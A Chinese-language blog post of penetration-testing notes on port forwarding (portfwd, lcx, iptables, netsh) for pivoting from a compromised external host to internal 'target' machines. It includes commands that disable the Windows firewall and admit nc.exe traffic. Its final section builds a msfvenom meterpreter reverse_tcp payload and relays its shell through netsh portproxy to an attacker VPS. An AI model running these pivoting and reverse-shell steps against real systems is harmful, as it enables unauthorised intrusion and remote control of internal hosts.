<!DOCTYPE html>
<html lang="zh-CN">
<head><meta name="generator" content="Hexo 3.9.0">
    <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">



<title>端口转发整理 | langke Blog</title>



    <link rel="icon" href="/favicon.ico">




    <!-- stylesheets list from _config.yml -->
    
    <link rel="stylesheet" href="/css/style.css">
    



    <!-- scripts list from _config.yml -->
    
    <script src="/js/script.js"></script>
    



    
    
        
    


</head>
<body>
    <div class="wrapper">
        <header>
    <nav class="navbar">
        <div class="container">
            <div class="navbar-header header-logo"><a href="/">langke&#39;s Blog</a></div>
            <div class="menu navbar-right">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/tag">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                

            </div>

        </div>
    </nav>

    
    <nav class="navbar-mobile" id="nav-mobile">
        <div class="container">
            <div class="navbar-header">
                <div>
                    <a href="/">langke&#39;s Blog</a><a id="mobile-toggle-theme">·&nbsp;Light</a>
                </div>
                <div class="menu-toggle" onclick="mobileBtn()">&#9776; Menu</div>
            </div>
            <div class="menu" id="mobile-menu">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/tag">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                
            </div>
        </div>
    </nav>

</header>
<script>
    var mobileBtn = function f() {
        var toggleMenu = document.getElementsByClassName("menu-toggle")[0];
        var mobileMenu = document.getElementById("mobile-menu");
        if(toggleMenu.classList.contains("active")){
           toggleMenu.classList.remove("active")
            mobileMenu.classList.remove("active")
        }else{
            toggleMenu.classList.add("active")
            mobileMenu.classList.add("active")
        }
    }
</script>
        <div class="main">
            <div class="container">
    
    
        <div id="post-toc" class="post-toc">
            <span class="post-toc-title">catalogue</span>
            <div class="post-toc-content">
                <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#端口转发工具"><span class="toc-text">端口转发工具</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#portfwd"><span class="toc-text">portfwd</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Linux版"><span class="toc-text">Linux版</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#meterpreter版"><span class="toc-text">meterpreter版</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#lcx"><span class="toc-text">lcx</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#iptables"><span class="toc-text">iptables</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#本地内网主机a-通过目标外网主机（Linux）b的端口1080-访问目标内网主机c的端口3389"><span class="toc-text">本地内网主机a 通过目标外网主机（Linux）b的端口1080 访问目标内网主机c的端口3389</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#netsh"><span class="toc-text">netsh</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#基本操作"><span class="toc-text">基本操作</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#对端口的控制"><span class="toc-text">对端口的控制</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#对进程的控制"><span class="toc-text">对进程的控制</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#本地主机A-访问目标外网主机B-后面的内网主机C的ssh"><span class="toc-text">本地主机A 访问目标外网主机B 后面的内网主机C的ssh</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#VPS主机A-接收目标外网主机B-后面的内网主机C的msf的Reverse"><span class="toc-text">VPS主机A 接收目标外网主机B 后面的内网主机C的msf的Reverse</span></a></li></ol></li></ol></li></ol>
            </div>
        </div>
    
    
    <article class="post-wrap">
        <header class="post-header">
            <h1 class="post-title">端口转发整理</h1>
            
                <div class="post-meta">
                    

                    
                        <span class="post-time">
                        Date: <a href="#">10 16&nbsp;&nbsp;10:31:36</a>
                        </span>
                    
                    
                </div>
            
        </header>

        <section class="post-content">
            <h1 id="端口转发工具"><a href="#端口转发工具" class="headerlink" title="端口转发工具"></a>端口转发工具</h1><h2 id="portfwd"><a href="#portfwd" class="headerlink" title="portfwd"></a>portfwd</h2><h3 id="Linux版"><a href="#Linux版" class="headerlink" title="Linux版"></a>Linux版</h3><p>官方网站：<a href="https://github.com/rssnsj/portfwd" target="_blank" rel="noopener">https://github.com/rssnsj/portfwd</a></p>
<p><strong>本地主机A 通过目标外网主机B的333端口 访问后面的内网主机C的3389端口</strong><br>参数 -d 在后台运行<br>在主机B上面执行<br><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./tcpfwd 333 主机C_IP:3389</span><br></pre></td></tr></table></figure></p>
<p>主机A上面执行<br><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mstsc /v 主机b外网IP:333</span><br></pre></td></tr></table></figure></p>
<p>即可访问主机C的3389端口</p>
<p><strong>IPv4-IPv6转换</strong><br><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">udpfwd [::]:1701 localhost:1701         <span class="comment"># 为本地L2TP服务添加IPv6支持</span></span><br><span class="line">tcpfwd 0.0.0.0:80 [2001:db8:3::2]:80    <span class="comment"># enable IPv4 access for an IPv6-only web service</span></span><br></pre></td></tr></table></figure></p>
<h3 id="meterpreter版"><a href="#meterpreter版" class="headerlink" title="meterpreter版"></a>meterpreter版</h3><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">portfwd add ‐l 33389 ‐r 192.168.1.119 ‐p 3389   <span class="comment"># 意思同上</span></span><br></pre></td></tr></table></figure>
<h2 id="lcx"><a href="#lcx" class="headerlink" title="lcx"></a>lcx</h2><p><strong>把内网主机端口转发到公网主机端口，访问公网主机对应端口等于访问内网主机对应端口</strong></p>
<p>lcx.exe –slave 公网IP 端口 内网IP  端口</p>
<p><strong>把本机的1端口转发到本机的2端口，访问2端口等于访问1端口</strong></p>
<p>lcx.exe –listen 端口1 端口2</p>
<p><strong>把本机端口1转发到目标机端口2</strong></p>
<p>lcx.exe -tran 端口1 目标及IP 端口2</p>
<h2 id="iptables"><a href="#iptables" class="headerlink" title="iptables"></a>iptables</h2><p><strong>简介</strong></p>
<p>官网：<a href="https://www.netfilter.org/" target="_blank" rel="noopener">https://www.netfilter.org/</a><br>详细命令：<a href="https://linux.die.net/man/8/iptables" target="_blank" rel="noopener">https://linux.die.net/man/8/iptables</a><br>iptables是运行在用户空间的应用软件，通过控制Linux内核netfilter模块，来管理网络数据包的处理和转发。在大部分Linux发行版中，可以通过手册页[1]或 man iptables 获取用户手册。通常iptables需要内核模块支持才能运行，此处相应的内核模块通常是Xtables。因此，iptables操作需要超级用户权限，其可执行文件通常位于/sbin/iptables或/usr/sbin/iptables。同时，需要说明的是，以上命令通常只用于处理IPv4数据包；而对于IPv6数据包，则使用类似的ip6tables命令。</p>
<h3 id="本地内网主机a-通过目标外网主机（Linux）b的端口1080-访问目标内网主机c的端口3389"><a href="#本地内网主机a-通过目标外网主机（Linux）b的端口1080-访问目标内网主机c的端口3389" class="headerlink" title="本地内网主机a 通过目标外网主机（Linux）b的端口1080 访问目标内网主机c的端口3389"></a>本地内网主机a 通过目标外网主机（Linux）b的端口1080 访问目标内网主机c的端口3389</h3><p><strong>先开启外网主机b的路由转发</strong><br>用vim把/etc/sysctl.conf配置文件中 net.ipv4.ip_forward=1 前面的注释去掉，或者直接添加<br>然后sysctl -p<br><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">/sbin/iptables -P INPUT ACCEPT</span><br><span class="line"></span><br><span class="line">iptables -t nat -A PREROUTING -d 主机b外网IP -p tcp -m tcp --dport 1080 -j DNAT --to-destination 主机c:3389</span><br><span class="line">iptables -t nat -A POSTROUTING -d 主机c -p tcp -m tcp --dport 3389 -j SNAT --to-source 主机b的内网IP（跟主机c同一网段的ip）</span><br><span class="line">iptables -A FORWARD -o 主机b内网网段所使用的网卡 -d 主机c -p tcp --dport 3389 -j ACCEPT</span><br><span class="line">/etc/init.d/iptables save 或者 iptables-save </span><br><span class="line">/etc/init.d/iptables restart</span><br></pre></td></tr></table></figure></p>
<p>本地命令行<code>mstsc /v 主机b外网IP:1080</code>就相当于访问主机c的3389端口</p>
<h2 id="netsh"><a href="#netsh" class="headerlink" title="netsh"></a>netsh</h2><p><strong>简介</strong><br>官方文档：<a href="https://docs.microsoft.com/en-us/windows-server/networking/technologies/netsh/netsh-contexts" target="_blank" rel="noopener">https://docs.microsoft.com/en-us/windows-server/networking/technologies/netsh/netsh-contexts</a><br>您可以使用本主题来学习如何输入netsh上下文和子上下文，了解netsh语法和命令格式以及如何在本地和远程计算机上运行netsh命令。<br>Netsh是一个命令行脚本实用程序，可让您显示或修改当前正在运行的计算机的网络配置。可以通过在netsh提示符下键入命令来运行Netsh命令，并且可以在批处理文件或脚本中使用它们。可以使用netsh命令配置远程计算机和本地计算机。<br>Netsh还提供了脚本功能，使您可以对指定的计算机以批处理模式运行一组命令。使用netsh，可以将配置脚本保存在文本文件中，以用于存档目的或帮助您配置其他计算机。</p>
<h3 id="基本操作"><a href="#基本操作" class="headerlink" title="基本操作"></a>基本操作</h3><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">netsh advfirewall show allprofiles                                              <span class="comment"># 查看当前系统防火墙状态</span></span><br><span class="line">netsh advfirewall <span class="built_in">set</span> allprofiles state off                                     <span class="comment"># 关闭当前系统防火墙</span></span><br><span class="line">netsh advfirewall <span class="built_in">set</span> allprofiles state on                                      <span class="comment"># 启用当前系统防火墙</span></span><br><span class="line">netsh -c interface ip dump &gt; c:\interface.txt                                   <span class="comment"># 导出配置脚本</span></span><br><span class="line">netsh advfirewall reset                                                         <span class="comment"># 重置当前系统的所有防火墙规则</span></span><br><span class="line">netsh -f c:\interface.txt                                                       <span class="comment"># 导入配置文件</span></span><br><span class="line">netsh advfirewall <span class="built_in">set</span> currentprofile logging filename <span class="string">"c:\windows\temp\fw.log"</span>  <span class="comment"># 自定义防火墙日志位置</span></span><br></pre></td></tr></table></figure>
<h3 id="对端口的控制"><a href="#对端口的控制" class="headerlink" title="对端口的控制"></a>对端口的控制</h3><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">netsh advfirewall firewall add rule name=<span class="string">"允许80/TCP端口入站流量"</span> dir=<span class="keyword">in</span> action=allow protocol=TCP localport=80   <span class="comment"># 允许80/TCP端口出站流量</span></span><br><span class="line">netsh advfirewall firewall delete rule name=<span class="string">"允许80/TCP端口入站流量"</span> dir=<span class="keyword">in</span> protocol=TCP localport=80             <span class="comment"># 删除对应策略</span></span><br><span class="line">netsh advfirewall firewall add rule name=<span class="string">"允许80/TCP端口出站流量"</span> dir=out action=allow protocol=TCP localport=80  <span class="comment"># 允许80/TCP端口出站流量</span></span><br><span class="line">netsh advfirewall firewall delete rule name=<span class="string">"允许80/TCP端口出站流量"</span> dir=out protocol=TCP localport=80            <span class="comment"># 删除对应策略</span></span><br></pre></td></tr></table></figure>
<h3 id="对进程的控制"><a href="#对进程的控制" class="headerlink" title="对进程的控制"></a>对进程的控制</h3><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">netsh advfirewall firewall add rule name=<span class="string">"nc入站"</span> dir=<span class="keyword">in</span> action=allow program=<span class="string">"c:\nc.exe"</span>     <span class="comment"># 允许nc.exe应用入站流量</span></span><br><span class="line">netsh advfirewall firewall delete rule name=<span class="string">"nc入站"</span> dir=<span class="keyword">in</span> program=<span class="string">"c:\nc.exe"</span>               <span class="comment"># 删除 允许nc.exe应用入站流量 策略</span></span><br><span class="line">netsh advfirewall firewall add rule name=<span class="string">"nc出站"</span> dir=out action=allow program=<span class="string">"c:\nc.exe"</span>    <span class="comment"># 允许nc.exe应用出站流量</span></span><br><span class="line">netsh advfirewall firewall delete rule name=<span class="string">"nc出站"</span> dir=out program=<span class="string">"c:\nc.exe"</span>              <span class="comment"># 删除 允许nc.exe应用出站流量 策略</span></span><br></pre></td></tr></table></figure>
<h3 id="本地主机A-访问目标外网主机B-后面的内网主机C的ssh"><a href="#本地主机A-访问目标外网主机B-后面的内网主机C的ssh" class="headerlink" title="本地主机A 访问目标外网主机B 后面的内网主机C的ssh"></a>本地主机A 访问目标外网主机B 后面的内网主机C的ssh</h3><p>Msfconsole的Bind马同样可以这样用<br><strong>在主机B上面执行</strong><br><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">netsh advfirewall firewall add rule name=<span class="string">"允许2222/TCP端口入站"</span> dir=<span class="keyword">in</span> action=allow protocol=TCP localport=2222</span><br><span class="line"><span class="comment"># 把外界从2222端口进入的流量全部转发到 主机C 的 22 端口</span></span><br><span class="line">netsh interface portproxy add v4tov4 listenport=2222 connectaddress=主机C_IP connectport=22</span><br><span class="line"><span class="comment"># 顺手查看全部转发规则，刚才设置的是否开启</span></span><br><span class="line">netsh interface portproxy show all</span><br><span class="line"><span class="comment"># 2222端口是否正常监听</span></span><br><span class="line">netstat -ano | findstr <span class="string">":2222"</span></span><br></pre></td></tr></table></figure></p>
<p><strong>主机A去连接主机C的ssh</strong></p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh root@主机B_ip -p 2222</span><br></pre></td></tr></table></figure>
<p><strong>删除主机B上面添加的规则</strong></p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">netsh advfirewall firewall delete rule name=<span class="string">"允许2222/TCP端口入站"</span> dir=<span class="keyword">in</span> protocol=TCP localport=2222</span><br><span class="line">netsh interface portproxy delete v4tov4 listenport=2222</span><br></pre></td></tr></table></figure>
<h3 id="VPS主机A-接收目标外网主机B-后面的内网主机C的msf的Reverse"><a href="#VPS主机A-接收目标外网主机B-后面的内网主机C的msf的Reverse" class="headerlink" title="VPS主机A 接收目标外网主机B 后面的内网主机C的msf的Reverse"></a>VPS主机A 接收目标外网主机B 后面的内网主机C的msf的Reverse</h3><p>Msf的Bind类似，只不过方向换一下。</p>
<p><strong>先生成马</strong><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p windows/meterpreter/reverse_tcp LHOST=主机B的内网IP LPORT=444 -f exe &gt; tcp_tunnel.exe</span><br></pre></td></tr></table></figure></p>
<p><strong>设置主机B netsh规则</strong><br><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">netsh advfirewall firewall add rule name=<span class="string">"444/tcp"</span> dir=<span class="keyword">in</span> action=allow protocol=TCP localport=444</span><br><span class="line">netsh interface portproxy add v4tov4 listenport=444 listenaddress=主机B的内网IP connectaddress=VPS主机A connectport=444</span><br></pre></td></tr></table></figure></p>
<p><strong>VPS主机A设置监听</strong><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">set LHOST VPS主机A外网IP</span><br><span class="line">set LPORT 444</span><br><span class="line">exploit -j</span><br></pre></td></tr></table></figure></p>
<p><strong>执行反弹</strong></p>
<p>主机C上面执行<code>tcp_tunnel.exe</code></p>

        </section>

        
            <section class="post-copyright">
                
                
                
                

            </section>
        

        <!--
        <section class="post-tags">
            <div>
                <span>Tag(s):</span>
                <span class="tag">
                    
                    
                        <a href="/tags/端口转发/"># 端口转发</a>
                    
                        
                </span>
            </div>
            <div>
                <a href="javascript:window.history.back();">back</a>
                <span>· </span>
                <a href="/">home</a>
            </div>
        </section>
        -->
        <!--
        <section class="post-nav">
            
                <a class="prev" rel="prev" href="/2019/11/01/社会工程学信息收集/">社会工程学信息收集</a>
            
            
            <a class="next" rel="next" href="/2019/09/26/基于MSF发现内网存活主机-Micropoor-整理/">基于MSF发现内网存活主机-Micropoor-整理</a>
            
        </section>
        -->

    </article>
</div>

        </div>
        <!--
        <footer id="footer" class="footer">
    <div class="copyright">
        <span>© langke | Powered by <a href="https://hexo.io" target="_blank">Hexo</a> & <a href="https://github.com/Siricee/hexo-theme-Chic" target="_blank">Chic</a></span>
    </div>
</footer>

    	-->

    	<br>
    	<br>
    	<br>



    </div>
</body>
</html>
